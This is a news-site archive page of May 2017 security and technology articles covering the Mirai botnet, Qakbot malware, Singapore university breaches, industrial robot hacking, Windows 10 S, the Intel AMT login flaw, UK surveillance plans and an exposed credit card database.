Monthly archives for May, 2017

Australian Federal Police Commissioner labels cyber a ‘genuinely wicked problem’

The issue of online crime cannot be solved simply by regulation or legislation, the head of the AFP has said.

While the internet is an overwhelming force for positive change, it remains one of the largest asymmetric threats faced, Australian Federal Police (AFP) Commissioner Andrew Colvin said on Wednesday.

“Not only can it be accomplished by a lone actor anywhere in the world, the blurred lines of attribution between criminal, commercial, and state make this a genuinely wicked problem,” he said.

Speaking to the National Press Club, Colvin said the agency would always be playing catchup to fight online crime, to an extent, and it needed to be solved with partnerships.

“Technology presents challenges to governments like almost never before,” Colvin said. “It is a realm that we cannot simply legislate or regulate to control — we must work with the industry who have their hands on the levers, and invariably, they are in the private sector.”

The Commissioner said cybercrime is pervasive and hits all levels of society.

“We find ourselves in an environment where we are trusting the internet with our personal information, our social networks and — incredibly, when you think about it — our money,” he said.

Colvin called for the use of traditional and non-traditional policing capabilities to ensure criminals cannot hide behind encryption to avoid the law.

“Prolific growth in the use of encryption technology is an everyday reality for investigators and we cannot afford for this to remain an obstacle.”

Despite Colvin stating legislation cannot be a silver bullet, the Federal Police were very supportive of the introduction of Australia’s metadata retention laws. The laws mandate the collection of customers’ call records, location information, IP addresses, billing information, and other data stored for two years by telecommunications carriers, accessible without a warrant by law-enforcement agencies.

Authorities do need a warrant to access the metadata of a journalist for the purposes of identifying a source, however.

Fronting Senate Estimates last week, Colvin said the AFP does not seek journalist metadata relating to sources as a routine matter, and has made no applications under Australia’s data-retention laws to seek such information.

As such, the AFP bungled the only time it handled a journalist’s metadata when it admitted to breaching the metadata laws last month.

The Commonwealth Ombudsman last week found the AFP to be handling metadata in a compliant manner, but noted a number of exceptions.

“We identified two instances where a stored communications warrant had been applied for and subsequently issued in respect of multiple persons, which is not provided for under the Act,” the report said.

In response, the AFP said its warrant templates were not clear enough.

It was also noted that on six occasions, warrants were exercised by people not authorised to; in three instances, the Ombudsman could not determine whether stored communications related to the person named on a warrant; and in one instance, it could not determine who had received stored communications from a carrier.


Botnets: Inside the race to stop the most powerful weapon on the internet

How security professionals stopped one botnet attack from getting much worse.

Even one of the simplest forms of cyberattack has the potential to catastrophic damage; a large DDoS attack by an army of hijacked devices is capable of knocking networks offline, leaving organisations and their customers unable to access services.

The impact of such an attack was made clear by the Mirai botnet incident late last year. The Mirai botnet used everyday internet-connected devices, such as routers and security cameras, to bring large chunks of the internet to its knees, slowing or outright bringing down popular websites and services.

But that wasn’t the end of Mirai’s malicious intent. A month later a million internet users in Germany were thrown offline in late November as part of a coordinated cyberattack which also impacted the UK, Ireland, Turkey, Iran, and Brazil, among others.

Internet provider Deutsche Telekom bore the brunt of much of the attack within German borders. Matthias Rosche, SVP of solution sales and consulting at Deutsche Telekom’s telecom security group, described it as “the biggest attack” against the company which had a “major” impact on its customer base.

Almost five percent of its 20 million customers suffered internet outages as a result of the botnet attack, which targeted ZYxel and DLink routers, exploiting an open port. In total, 900,000 routers were affected by the attack.

The attack wasn’t capable of stealing data, but it still created massive problems, resulting in 30 hours of downtime for 900,000 internet connections in homes and businesses across Germany.

“What we saw was that there were specific routers which had issues and problems. Looking at the statistics, we saw that a significant number went down immediately,” Rosche said, speaking at a conference arranged by security company Check Point in Milan.

The malware contained a link designed to upload malicious software to the devices in order to connect them to the botnet, but Deutsche Telekom quickly moved to minimise the potential damage of this threat.

“We started to investigate into the attack and figured out there was a download link embedded to upload to malicious software. So the first thing we did was block that to make sure that even if the infection is successful, nothing can be uploaded from that specific link,” said Rosche.

The company’s security team set up a war room to coordinate activities and block the key target open port across the network, in order to ensure no attack could target it anymore, he explained.

In addition to this, an agreement between Deutsche Telekom and the router vendors meant as soon as the telecoms firm knew how to close the vulnerability, they contacted the vendors and provided them with the information required to update devices and protect them against the botnet.

“Within 12 hours we had a new software version available for our routers,” said Rosche, adding that users were informed they had to turn routers on and off again and to protect themselves from the attack.

“This was a simple patching process and we were happy this was our worst-case scenario,” he said of the incident.

If the attack had been fully successful, the results would’ve been dire and a danger to the internet.

“It’s a simple calculation. We’d have had a new botnet of 1.8 terabits per second, which is big enough to carry out a DDoS attack against any state in the world. This would’ve been the most powerful weapon on the internet, it would have been incredible,” said Rosche.

“We apologised to our customers and the question we had to ask ourselves was, ‘Can we guarantee that this won’t happen again in the future?’ The answer is ‘probably not’. But we’ll be prepared,” he said.


Fresh wave of mutating Qakbot malware brings down enterprise networks

The malware is able to lock out companies from accessing their networks as well as infecting neighboring systems.

The Qakbot malware is making a comeback with a new campaign targeting enterprise players to disrupt operations and lock companies out of their own systems.

On Tuesday, researchers from Cylance said that Qakbot, an information-stealing Trojan and backdoor malware that targets the Microsoft Windows operating system and 64-bit browsers with a particular slant towards business users, is back with a new campaign — and thanks to a re-write from the ground up, is even nastier than before.

Qakbot, also known as Bublik and Qbot, is a self-propagating kind of malware that has been circulating for years. The Trojan can spread not only through networks and external drives and devices but also focuses on stealing valuable credentials and harnessing control of the networks it has infected.

There has been a resurgence of the malware, according to Cylance, which had been made even more evasive and persistent with new, polymorphic features that enable the malicious code to squat in business networks for longer and “easily thwart legacy endpoint [security] solutions” by the use of obfuscating code, as well as constantly-evolving file makeup and signatures.

Cylance says this “seemingly immortal malware” continues to be a thorn in the side of the enterprise due to feature enhancements, multiple obfuscation layers and server-side polymorphism, which allows the malware to mutate rapidly, circumventing signature-based antivirus systems while on the move.

Once a system has been infected with Qakbot through exploit kit use, phishing campaigns or malicious downloads, the malware does not lock a system in order to hold a business to ransom, unlike ransomware.

Instead, Qakbot is able to lock out Active Directories and once credentials have been stolen, use these to spam neighboring hosts and disrupt corporate activities. In turn, this may result in the compromise of additional hosts and further spread or the user accounts related to the authentication attempts being locked out.

“Qakbot continues to be a significant threat due to its credential collection capabilities and polymorphic features,” Cylance says. “Unhindered, this malware family can rapidly propagate through network shares and create an enterprise-wide incident.”

New samples of the malware suggest that Qakbot now also targets victims globally due to the inclusion of international character sets, and a recent surge in attacks means that companies should stay on their guard against suspicious downloads or activity and keep their systems up-to-date to prevent infection.

“While it’s unclear why so many systems have suddenly fallen victim to Qakbot, it’s possible that updated exploit kits play a role,” Cylance says. “After all, there is no shortage of new vulnerabilities and exploits for attackers to use to their advantage.”

Read also: 386 WannaCry ransomware samples discovered in the wild

Earlier this month, Mac app developers warned that users who have recently downloaded the Handbrake video transcoder app may have been infected with Trojan malware after a download mirror was compromised by cyberattackers.


Singapore university breaches reveal wider attack surface to safeguard

Government’s increasing industry collaboration and research efforts suggest Singapore needs a cybersecurity strategy that goes beyond limiting internet access, as two universities fall prey to APT attacks.

Security breaches this week in Singapore and around the globe reveal the country will have to safeguard a much wider attack surface and need a cybersecurity strategy that goes beyond simply limiting internet access.

It was revealed on Friday that two Singapore universities suffered APT (advanced persistent threat) attacks last month, with the hackers specifically targeting government and research data.

The National University of Singapore (NUS) had detected the intrusion on April 11 when assessments were being carried out by external consultants brought in to boost its cybersecurity posture. Days later on April 19, the Nanyang Technological University (NTU) uncovered its breach during regular checks on its systems.

The universities notified Cyber Security Agency of Singapore (CSA), the government agency tasked with overseeing the country’s cybersecurity operations, which helped both institutions conduct forensic investigations into the attacks.

CSA determined that the breaches were the result of APT attacks and were “carefully planned and not the work of casual hackers”.

“The objective may be to steal information related to government or research,” the government agency said in a statement Friday, adding that data related to students did not appear to be targeted. Critical IT systems, such as student admissions and databases containing examination documents, also were not affected.

“As the universities’ systems are separate from government IT systems, the extent of the APT activities appear to be limited,” CSA said. The agency said it was helping the universities with incident responses and measures to further mitigate any potential impact, adding that affected desktop computers and workstations at both universities had been removed and replaced.

“We know who did it and we know what they were after, but I cannot reveal [details on] this for operational security reasons,” CSA chief executive David Koh said. The agency also refused to reveal what information the hackers were able to access, but said no classified data was stolen.

It did say, though, that government sectors running critical information infrastructures (CIIs) were informed of the breaches and put on alert. All government bodies and agencies also had been urged to be extra vigilant and beef up checks on their networks.

“There has been no sign of suspicious activity in CII networks or government networks thus far,” CSA said.

In a Facebook post Friday, Singapore’s Minister for Communications and Information Yaacob Ibrahim said the breaches were “a stark reminder that cyber threats are real in Singapore”.

“As we become more digitally connected, such threats will continue to increase in sophistication, and both public and private sector organisations are equally vulnerable,” he said. “Everyone has a role in ensuring cybersecurity. At the individual level, we can and should also do our part to be vigilant, and practise good cyber hygiene.”

The minister is right, of course, but that means the government also needs to realise it cannot choke the pipe to stem the leak when new joints are continuously being added to the pipeline.

In its bid to contain potential data leaks, the Singapore government last June said it was restricting internet access on all computers used by civil servants, affecting an estimated network of 100,000 workstations. Government employees would only have online access via dedicated work terminals or be allowed to browse the web via their own personal mobile devices, since these would have no access to government e-mail systems.

However, as part of its efforts to drive its smart nation initiative, the Singapore government had been actively involved in various data research efforts as well as increased its collaboration with industry players. The Land Transport Authority (LTA), for instance, was piloting the use of self-driving buses and conducting research with NTU to improve real-tine monitoring of the national rail system.

The National Research Foundation (NRF), a unit under the Prime Minister’s Office, in February also launched a S$8.4 million (US$5.93 million) cybersecurity lab located at NUS to provide a “realistic environment” for cybersecurity research and testing. And just last week, NRF unveiled plans to develop Singapore’s capabilities in artificial intelligence and data science, which would involve several government agencies as well as universities including NTU and NUS.

Its efforts to digitally transform the nation and prep its citizens for a digital economy are commendable and should be further encouraged, but it also unravels a significantly wider attack surface on which malicious hackers can target.

Adopting a strategy that involved “separating” or “delinking” internet access in the public sector would unlikely be truly effective in preventing attackers from targeting government data or systems.

As the NTU and NUS breaches demonstrated, “not-so-casual hackers” were more than capable of identifying other entry points and vulnerabilities elsewhere to access government and research data.

What if they were able to get their hands on research NTU was working on with LTA, uncovered information on train operations, and used that to disrupt the national rail system? And they would have achieved that without even having to target or breach LTA’s “internet-less” computer systems.

Worse, touting a strategy based on restricted internet access as a way to stop attackers could lull government employees into a false sense of safety. There must be realisation that it wouldn’t matter if the universities’ systems were “separate” from government IT systems or that this “limited” the extent of the APT activities.

Amid the flurry of smart nation and digitisation efforts across Singapore, government data as well as valuable research data could reside outside of government systems and within the reach of malicious hackers.

Commenting on the university breaches, LogRhythm’s Asia-Pacific Japan vice president Bill Taylor-Mountford, said: “The attack shows that hackers are no longer just targeting the usual suspects in Singapore, such as financial institutions, government, and critical infrastructure. Establishments such as universities hold valuable personal data, including intellectual property that can bring about financial gain.”

Darktrace’s Asia-Pacific managing director Sanjay Aurora concurred, and urged businesses to realise it would be impossible to stop every threat making its way into the network.

Taylor-Mountford added: “Today, we can no longer prevent attackers from gaining access. We are almost fighting a losing battle if we only focus on prevention. It is more important to be able to detect a breach and quickly neutralise it.

“Reducing the mean time to detect and respond must be the key objective for any cybersecurity infrastructure today,” he said.

Aurora touted the need for machine learning and artificial intelligence to better detect APT and other emerging attacks within the network. This would alert systems administrators to anomalies and automate processes, such as isolating compromised systems from the internet, to provide security teams more time to investigate and address the threat, he said.

The massive ransomware infection on Friday that affected more than 70 countries, including the UK, Spain, and Russia, further suggest more of such sophisticated and coordinated attacks are in the horizon. And these could shut down critical services such as healthcare, as the UK experienced this week, when the ransomware attacks crippled healthcare systems, forcing hospitals to close emergency rooms and cancel surgeries.

So, it’s no longer a question of “if”, but “when” cyberattacks will hit. The Singapore government clearly knows this, but it now needs to actually believe it and act on it. It would be quite tragic if it decides instead to extend its internet separation tactic beyond the public sector or scale back its industry collaboration.


Now, hackers are targeting internet-connected industrial robots

A new report reveals that industrial robots could easily be hacked.

Instead of speculating about what will happen when robots attack humans, perhaps we should be worried about what could happen if humans attack robots.

Fleets of robots that were originally designed to be isolated in a factory are now connected to the internet and prone to hacking. Tens of thousands of industrial robots aren’t properly protected, according to a new research report by cyber security firm Trend Micro and Italian university Politecnico di Milano.

“These robots have been designed with a lot of focus on physical security, but what this research has shown is that there’s a lot to be done on the cyber-security side,” Mark Nunnikhoven, Trend Micro’s vice president of cloud research, told ZDNet.

New cloud capabilities are convenient for robot operators and hackers alike. While many companies have prioritized cyber-security for protecting data on computers or internal networks, the same vulnerability for industrial robots has been overlooked.

“It’s a pattern we’ve seen in different industries and in different verticals,” Nunnikhoven said. “Robots were designed with an original concept for their deployment and that concept and those constraints no longer hold true.”

When the first industrial robot was introduced to a General Motors assembly line in 1961, it followed a series of steps to weld car parts. It was big, strong, and potentially destructive. For this reason, industrial robots were caged so they couldn’t accidentally harm any nearby people or products. Today’s robots are more agile and precise — but what would happen if someone messed with the controls?
Robot hackers could steal trade secrets or cause operator injuries, but a more likely scenario is that state-sponsored or corporate interests would cause a manufacturing disruption. The new report reveals what could happen if a hacker altered a controller’s parameters or tampered with the production logic. Even a slight change could result in defective products.

To see how this scenario might play out, the researchers adjusted an industrial robot’s parameters to convince it that it was drawing a straight line when it was actually drawing a very slight curve. Even by introducing a two-millimeter defect, a hacker could cause an expensive manufacturing disruption. A scarier scenario is that the error would go unnoticed because an automated quality control check would confirm that the robot followed its parameters.

“But if that robot was programmed to weld something like a car chassis or a wing for an airplane, that could be an absolutely catastrophic outcome,” Nunnikhoven points out. Previous research has shown that even a small defect in a rotor can make a drone drop to the ground mid-flight.

While drones are mostly used for recreation, military missions, or infrastructure inspections, industrial robots build a wide variety of products. They are used in aerospace, automotive, pharmaceutical, and electronics manufacturing (and just about everything in between).

The report focuses on industrial robots, but the conclusions also apply to automation and the Internet of Things on a broader level.

“[Industrial robots] were intended to be used in isolation and never to be connected to the outside world and we found that it’s not true anymore,” Nunnikhoven explains. “They’re connected to both inside networks and the internet, so there’s a risk profile that hasn’t really been considered.”

“And while some of the motivations are different than our normal cyber-attacks, the consequences are significantly more real. There are definitely consequences in the physical world, and that’s something very different than what we’re used to seeing, where data is destroyed or held for ransom,” he said.

“This involves risk to real people, and real physical risks, not just financial risk or reputational risk,” he added.


Why Windows must die. For the third time

Microsoft knows Windows is obsolete. Here’s a sneak peek at its replacement.

Last week, a key event occurred in the history of personal computing. It marks the beginning of the death of the operating system that we recognize today as Microsoft Windows.

This euthanizing of Windows has been planned for at least five years, and Microsoft knows that it is necessary for the company’s software business and for the PC industry to evolve and stay healthy.

In order for the Windows brand and Microsoft’s software business to live, Windows — as it exists today — must die.

It is important we have some historical perspective of what “death” actually means for Windows, because it’s already happened twice.

The first of Windows’ lives occurred in the period between 1985 and 1995. During this time, Windows was a bolt-on application execution environment that ran on top of the 16-bit DOS operating system, which was introduced with the original IBM PC in 1981.

That OS “died” in 1995, when Windows 95 — the first 32-bit version of the OS — was released.

From 1989 to 2001, on a separate track, Microsoft also developed Windows NT, a 32-bit, hardware-abstracted, full pre-emptive, protective memory, multi-threaded multitasking OS designed for high-performance RISC and x86 workstations and servers.

The commonality that the consumer version of Windows and Windows NT had was that they shared many of the same APIs, which are collectively known as Win32.

Largely implemented using the C programming language, Win32 became the predominant Windows application programming model for many years. The majority of legacy Windows applications that exist in the wild today still use Win32 in some form. (This is an important takeaway that we will return to shortly.)

In 2001, Windows NT (at that time branded as Windows 2000) and the consumer version of Windows (Windows ME) merged into a single product: Windows XP.

Thus, the second generation of Windows technology descended from Windows 95 “died” at this time.

Shortly after the release of Windows XP, in 2002, Microsoft introduced the .NET Framework, which is an object-oriented development framework that includes the C# programming language.

The .NET Framework was intended to replace the legacy Win32. It has continued to evolve and has been slowly adopted by third-party ISVs and development shops. Over the years, Microsoft has adopted it internally for the development of Office 365, Skype, and other applications.

That was 16 years ago. However, Win32 still is the predominant legacy programming API. More apps out in the wild use it than anything else. And that subsystem remains the most significant vector for malware and security threats because it hosts desktop-based browsers, such as Internet Explorer and Chrome.

A lot has changed in the technology industry in 16 years, especially the internet. Web standards have changed, as have the complexity and sophistication of security threats. More and more applications are now web-based or are hosted as SaaS using web APIs.

Microsoft introduced a new programmatic model with the introduction of the Windows 8 OS. That framework, which is now commonly known as Universal Windows Platform (UWP), is a fully modernized programming environment that takes advantage of all the new security advancements introduced since Windows 8 and that are in the current Windows 10.

While Windows 8 was not well-received in the marketplace because of its unfamiliar full-screen “Metro” UX, the actual programmatic model that it introduced, which was greatly improved for desktop-style windowing in Windows 10, is technically sound and much more secure than Win32 due to its ability to sandbox apps.

In addition to including the latest implementation of .NET, UWP also allows apps to be programmed in C++, C#, Objective C, VB.NET, and Javascript. It uses XAML as a presentation stack to reduce code complexity.

Microsoft Edge, the completely re-designed browser that was introduced in Windows 10, is a native UWP application with none of the security drawbacks of Internet Explorer. Other native UWP applications include Windows Mail, Skype for Windows 10, and some of the applications in the Windows Store.

It could be said that the third Windows death, the end of the Win32 API, is long overdue. It has existed in some form or another since at least the late 1980s. But what has been keeping it alive?

Some of it is developer laziness. It’s not like they haven’t had 15 years to learn and adopt .NET and the past five years to adopt Metro/Modern/UWP.

To be fair, many of them have incorporated certain aspects of .NET into their apps as they kicked the can with their legacy codebase down the road, such as with the use of Windows Presentation Foundation (WPF) in .NET 3.0. But in a lot of cases, fully migrating code bases to UWP from Win32 would mean complete re-implementation.

That takes time and money.

Not all of this is developer laziness; it’s also the systemically bad end-user and IT organizational habits of keeping old versions of apps around rather than move into newer licensing models and newer versions of the apps.

These legacy apps, many of which are running long past the expiration of their last service pack and ISV recommendations to decommission them and end-of-life notices, are of course far more likely to be susceptible to security threats.

A lot of ISVs are going the SaaS and web app route, or are providing their legacy apps in hosted desktop environments while they develop modernized web and SaaS apps to replace them.

Win32’s persistence and hanging on extended life support puts Microsoft in a bad situation.

So what kind of shape is UWP in today? Is it ready for developers to move to as a complete replacement programming model for Win32?

With Windows 10 and UWP, the company finally has a modernized OS that is ready to host the desktop and mobile application workloads of the 21st century. It’s secure and it finally makes good on the company’s Trustworthy Computing initiative that it began in 2002.

A lot has changed over the last five years since the original Metro/WinRT programming stack was introduced with Windows 8.

Indeed, many of the API changes have not been rolled out in a developer-friendly fashion and a lot of the applications currently delivered in the Windows Store are based on older API versions and are not “universal” by any stretch.

That being said, the current implementation of UWP is quite good, and anything written to it will run on any architecture that UWP runs on, which includes all the versions of Windows 10, XBOX One, and the Hololens.

There aren’t many notable examples of them, but if you have a Windows 10 phone, which uses ARM and Windows 10, which is x86, and if you buy a UWP app on the Windows Store, the developer has the option of offering one that runs on both, using the same code.

My preferred Twitter client, Tweetium, is one of these — so are the built-in Mail and Calendar apps on Windows 10.

The more web standards that are incorporated into your UWP apps, and the more code that is executed directly on the cloud itself, the more portable, the more lightweight, and more mobile your code is.

Unfortunately, the only problem with Windows 10’s advanced security model is when you run legacy apps on it. That’s the double-edged sword of backward compatibility.

Microsoft’s only choice to move forward is to throw the Win32 baby out with the bathwater. And that brings us to the introduction of Windows 10 S.

Windows 10 S is just like the Windows 10 you use now, but the main difference is it can only run apps that have been whitelisted to run in the Windows Store. That means, by and large, existing Win32-based stuff cannot run in Windows 10 S for security reasons.

To bridge the app gap, Microsoft is allowing certain kinds of desktop apps to be “packaged” for use in the Windows Store through a tooling process known as Desktop Bridge or Project Centennial.

The good news is that with Project Centennial, many Desktop Win32 apps can be re-purposed and packaged to take advantage of Windows 10’s improved security. However, there are apps that will inevitably be left behind because they violate the sandboxing rules that are needed to make the technology work in a secure fashion.

Read also: How IBM can avoid the abyss | Intel x86: No cloud for you | Four years at Microsoft: My ringside seat to unprecedented transformation | Windows 10 S has the potential to create lifelong Microsoft customers (TechRepublic)

One of the key benefits of Centennial apps is that even though they run with normal user privileges, they still take advantage of some OS isolation so they can be seamlessly removed from the device. They are packaged/compartmentalized and are updated directly from the Windows Store (which helps to avoid “Windows rot”).

Win32 apps put a tremendous drag on the on the developer ecosystem — and Centennial is a straightforward and easy step toward removing that drag. For application developers, it also provides some great analytics tools as well for software distribution to various markets.

Centennial is also an acknowledgment on Microsoft’s part that Win32 apps are here to stay and developers aren’t going to move off of them wholesale. Instead, it gives developers the ability to take baby steps with their application and get them into the Windows Store (which in turn helps Microsoft, because it makes the store ecosystem more relevant to customers).

Some Win32 apps can probably be remediated for Centennial easily, some cannot. The more legacy an app codebase is, the worse shape it is probably in.

A casualty of those sandboxing rules is Google’s Chrome browser. For security reasons, Microsoft is not permitting desktop browsers to be ported to the Store. In theory, Google could build its own compatible UWP browser, but it would bear little resemblance to Chrome on the desktop. The default browser, for now, is Microsoft Edge, period.

As it stands, you also can’t change the default search engine to Google from Bing either. All of this is done under the auspices of improved security.

Obviously, not everyone is going to be able to run an OS like Windows 10 S overnight. So Microsoft is using the Surface Laptop and other low-cost systems in the $200 to $300 range made by OEMs as a trial balloon to test the waters of the end-user market.

Who is Microsoft targeting? Education and Home users and those who mostly use the browser to do daily tasks and don’t use legacy desktop-based line of business applications. That’s the exact same demographic that Google is targeting with Chrome OS.

You can accuse Microsoft of many things, but sitting on its laurels and being risk-averse is not one of them. There’s a lot of risk in releasing a version of Windows and accompanying systems that cannot run a preponderance of legacy Windows applications out of the box.

However, the reward, if successful, will be tremendous. Not just for Microsoft itself but also for the end-users that will have a much more secure computing experience to show for it.

There is clearly much more work that has to occur to ditch Win32 beyond getting the majority of users on a Windows OS that doesn’t run legacy code.

Microsoft needs to build modernized versions of Office in order for enterprises to move, for starters. And we are years out from that becoming the desired deployment model for Office, even if Microsoft wanted the next version of 365 to be UWP-based, which we presume it does.

To realize that endgame, another half of the future Windows OS has to mature that end-users don’t see. And that’s Azure.

I like to think of this as like the building of a transcontinental tunnel, like the kind they built between England and France. One-half is the modern, security-enhanced version of Windows 10 that runs only UWP and Centennial stuff. The other is the cloud back-end that makes much of it possible.

Like burrowing out the transcontinental tunnel, at some point, the tunneling machines will eventually meet in the middle.

Today, Office 365 is deployed as “Click-to-Run” desktop code. It is a type of application packaging technology that is derived from App-V, which is a virtualization technology that is also referred to as application sequencing.

The Office client applications are also updated every month as part of your Office 365 subscription, so as long as you don’t turn updates off you are always running the most current version of Office.

But it still all executes locally on the device. It is not hosted remotely, like Citrix, nor is it a web app.

How does Click-to-Run get around the problem that the installer is Win32? It copies the sequence of files that gets installed, but that doesn’t change the fact that the Office code that runs is still Win32.

Third party installer tools developers use can also create Centennial compatible app packages.

All Windows 10 users can still be able to get a lot done out of the box because the web-based Office Online already runs well using Edge. You can be reasonably productive in a business environment using strictly those apps, especially if you need to share and collaborate on Office docs with other people.

There are definitely some limitations but I would say for at least 50 percent of workers who use Office on a day to day basis, the web versions of the Office apps get the job done.

Surface Laptop owners will get a free one-year Office 365 subscription that will work with the Office desktop software pre-loaded onto their devices and updated from the Store. Qualifying educational customers — who have free licenses of Office 365 for Education –will also be able to use that desktop app with their Office subscription. In fact, anyone with an Office 365 subscription, using any edition of Windows 10, can use that Store app.

Today, the Click-to-Run/App-V software distribution technology is tied largely to the x86 platform because of the way desktop apps are written. But UWP apps don’t have this limitation; they can run on Windows 10 Mobile, or in theory, a Windows 10 PC running on an ARM processor.

Those types of ARM-based systems don’t exist today. The original Surface RT, which was an early attempt at this, failed. It was also underpowered, which didn’t help.

But in a few years, they could return, because Microsoft has done all of the hard work since its Windows 8 mishaps to undergo full platform convergence.

The ARM architectural licensees like Qualcomm, Samsung, TSMC, Nvidia, Huawei, and others now manufacture powerful, 64-bit, multi-core SoCs that have plenty of CPU and RAM headroom as well as fast bus speeds to run an OS like Windows 10 S easily.

As Microsoft’s Azure cloud evolves and the 365 Online offerings become more and more sophisticated, more apps using web APIs can be wrapped as UWP. This also goes for third-party web apps, including Google’s, if the developers put some minimal effort to optimizing their web apps for the Edge rendering engine.

Just take a look at Kiwi for Gmail, which a single, third-party developer wrote. No Chrome engine or desktop code required. It makes all the Google apps look like modern Windows apps. A company with Google’s resources could certainly make UWP apps look very polished indeed. Whether it’s actually willing to is another matter altogether, due to its own desire to control its application ecosystem and userbase.

There will be less and less need for legacy desktop apps running on client devices, particularly when legacy code can be isolated in Azure using virtual machines and containers for improved security. That’s where stuff like XenApp Essentials and XenDesktop Essentials by Citrix and other third-party desktop hosting technologies like IndependenceIT come in.

It also wouldn’t surprise me either to see some type of Windows container technology to be deployed on the client device directly in a future version of Windows 10 S so that UWP and Centennial apps can be totally isolated from each other, a la Bromium.

Windows, as we know it today, based on the legacy Win32 APIs that have been around for decades, will die. That’s Microsoft’s intention as well as its current mission to improve the overall computing experience for everyone. But Windows as a brand will continue, as a secure operating system optimized for applications that heavily leverage public and private clouds.

However, our definition of personal computing and also the PC will also change with it.


Intel chip vulnerability lets hackers easily hijack fleets of PCs

Security researchers say exploiting the vulnerability requires little technical
expertise, and can result in a hacker taking full control of an affected PC.

A vulnerability in Intel chips that went undiscovered for almost a decade allows
hackers to remotely gain full control over affected Windows PCs without needing a

The “critical”-rated bug, disclosed by Intel last week, lies in a feature of Intel’s
Active Management Technology (more commonly known as just AMT), which allows IT
administrators to remotely carry out maintenance and other tasks on entire fleets of
computers as if they were there in person, like software updates and wiping hard
drives. AMT also allows the administrator to remotely control the computer’s keyboard
and mouse, even if the PC is powered off.

To make life easier, AMT was also made available through the web browser —
accessible even when the remote PC is asleep — that’s protected by a password set by
the admin.

The problem is that a hacker can enter a blank password and still get into the web
console, according to independent technical rundowns of the flaw by two security
research labs.

Embedi researchers, credited with finding the bug, explained in a whitepaper posted
Friday that a flaw in how the default “admin” account for the web interface processes
the user’s passwords effectively lets anyone log in by entering nothing at the log-on

“No doubt it’s just a programmer’s mistake, but here it is: keep silence when
challenged and you’re in,” said the researchers.

Tenable researchers confirmed the findings in a detailed analysis of the flaw, also
posted Friday, saying it was relatively easy to remotely exploit.

Intel’s advisory said that systems — including desktops, laptops, and servers —
dating back as early as 2010 and 2011 and running firmware 6.0 and later are affected
by the flaw.

But Embedi warned that any affected internet-facing device with open ports 16992 and
16993 are at risk. “Access to ports 16992/16993 are the only requirement to perform a
successful attack,” said the Embedi researchers.

Since the disclosure, monitors have seen a spike in probing activity on the two
affected ports.

Intel so far hasn’t said how many devices are affected.

However, a search on Shodan, the search engine for open ports and databases, shows
more than 8,500 devices are vulnerable at the time of writing, with almost 3,000 in
the US alone — but there could be thousands more devices at risk on internal

In a statement, Intel said that it’s working with its hardware partners to address
the problem, and “expect[s] computer-makers to make updates available beginning the
week of May 8 and continuing thereafter.”

So far, Dell, Fujitsu, HP, and Lenovo have all issued security advisories and
guidance on when they will roll out fixes to their customers. Consumer devices aren’t
affected by the bug.

The chipmaker has also published a discovery tool to determine if machines are


Leaked document reveals UK plans for wider internet surveillance

The UK government is soliciting feedback from a handful of internet providers, but
isn’t consulting the tech industry or the public.

The UK government is planning to push greater surveillance powers that would force
internet providers to monitor communications in near-realtime and install backdoor
equipment to break encryption, according to a leaked document.

A draft of the proposed new surveillance powers, leaked on Thursday, is part of a
“targeted consultation” into the Investigatory Powers Act, brought into law last
year, which critics called the “most extreme surveillance law ever passed in a

Provisions in proposals show that the government is asking for powers to compel
internet providers to turn over the realtime communications of a person “in an
intelligible form,” including encrypted content, within one working day.

To that end, internet providers will be forced to introduce a backdoor point on their
networks to allow intelligence agencies to read anyone’s communications.

This “backdoor” capability was heavily criticized last year when it was floated as
part of the draft law’s proposal. Apple chief executive Tim Cook last year warned of
“dire consequences” if the legislation required internet providers or companies to
put backdoors into their systems. The provision would effectively prohibit companies
operating in the UK from introducing end-to-end encryption, a feature now commonplace
in many messaging apps, including Facebook Messenger, WhatsApp, and Apple’s own
messaging platform iMessage.

But it’s not clear exactly how the provision would be enforced — or if it would only
affect companies operating or based in the UK.

Similar questions arose when a committee of UK lawmakers criticized the original
Investigatory Powers Act prior to it becoming law late last year.

Jim Killock, executive director of Open Rights Group, who obtained the document, said
in an email that the proposals, if passed, would “make security products much easier
to break into, and means that companies may be obliged to lie to their customers
about the privacy and security that is applied to their communications.”

The draft document also asks for the capability to realtime intercept data on one out
of 10,000 citizens at any given time, allowing the government to wiretap over 6,500
citizens at any given time.

But the lack of transparency over the proposals has already drawn ire.

“The government doesn’t think it has any legal or moral obligation to consult anyone
outside of industry partners and the security services,” said Killock.

So far, the draft document has only been circulated among the UK government’s
technical advisory board, consisting of six telecoms giants, including O2, BT, BSkyB,
and Vodafone, as well as government agencies who would use the powers, thought to
include at least MI5 and GCHQ.

But the document was not made readily available on the government’s website, or to
partners in the tech industry, who would be directly affected by the provisions if
passed into law.

The consultation is open for the next three weeks until May 19, said Killock, during
which anyone can file a response with the Home Office.

A spokesperson for the Home Office did not respond to a request for comment at the
time of writing.


A database of thousands of credit cards was left exposed on the open internet

The data was exposed for at least six months — likely longer.

A US online pet store has exposed the details of more than 110,400 credit cards used
to make purchases through its website, researchers have found.

In a stunning show of poor security, the Austin, Texas-based company
exposed its entire customer database, including names, postal and email addresses,
phone numbers, credit card information, and plain-text passwords.

Several customers that we reached out to confirmed some of their information when it
was provided by ZDNet, but they did not want to be named.

The database was exposed because of the company’s own insecure server and use of
“rsync,” a common protocol used for synchronizing copies of files between two
different computers, which wasn’t protected with a password.

Researchers at the Kromtech Security Research Center found the database in November.
But after numerous efforts to contact the company by phone and email, the database
was only secured this week.

It’s not clear who’s to blame for the breach. The pet store is understood to have
been developed by DataWeb Inc., which has built dozens of other similar pet-related
sites and owns PegasusCart, an ecommerce platform, used on all of DataWeb’s sites.
Kromtech researcher Bob Diachenko found that the leaked data wasn’t limited to just, but also appeared to contain several folders, including one that
shows several backup files and databases of transactions within the DataWeb network.

“They have everything in there — from ad campaigns to thousands of orders details,
with full customer payment details exposed, with IP addresses tracked down for
milliseconds,” said Diachenko, who also blogged about the discovery.

However, there’s no evidence to suggest that any PegasusCart data had been exposed.

Todd Nelson, co-founder of PegasusCart, said in an email that the owners of the site
“explained that, as of a year or so ago, their data was moved to an outside cloud
based ecommerce platform.” (At the time of writing, still used
PegasusCart on its website.)

“If they were breached on their web server and any data were found, it would be very
old and likely quite useless, but they jumped into action anyway,” he said.

“They have solicited a security firm to investigate the issue and plug any hole
should one exist,” he added, but he didn’t say if the company would inform its
customers of a breach.

The upside to the story is that the exposure has stopped, but it’s not clear who else
may have accessed the data — or if that data, such as credit card information, has
been used.

Gone are the days where hackers will target en masse the larger companies, rare as
